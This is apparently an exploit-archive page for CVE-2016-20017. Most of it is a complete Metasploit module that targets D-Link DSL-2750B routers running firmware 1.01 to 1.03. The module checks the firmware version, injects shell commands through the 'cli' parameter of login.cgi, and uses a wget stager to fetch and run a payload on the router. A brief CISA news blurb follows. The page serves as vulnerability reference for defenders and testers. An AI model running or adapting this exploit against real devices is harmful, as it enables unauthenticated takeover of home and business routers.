Headline
CVE-2016-20017: Offensive Security’s Exploit Database Archive
D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DSL-2750B OS Command Injection',
'Description' => %q(
This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
Vulnerability can be exploited through "cli" parameter that is directly used to invoke
"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
),
'Author' =>
[
'p@ql', # vulnerability discovery
'Marcin Bury <marcin[at]threat9.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['PACKETSTORM', 135706],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
],
'Targets' =>
[
[
'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
[
'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Feb 5 2016',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::FLAVOR')
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/ayefeaturesconvert.js'
)
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = Regexp.last_match[1]
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" && version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed')
return CheckCode::Unknown
end
def execute_command(cmd, _opts)
payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
send_request_cgi(
{
'method' => 'GET',
'uri' => '/login.cgi',
'vars_get' => {
'cli' => "#{payload}$"
},
'encode_params' => false
},
5
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
end
def exploit
print_status("#{peer} Checking target version...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
execute_cmdstager(
flavor: :wget,
linemax: 200
)
end
end
Related news
CISA Flags 6 Vulnerabilities - Apple, Apache, Adobe , D-Link, Joomla Under Attack
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.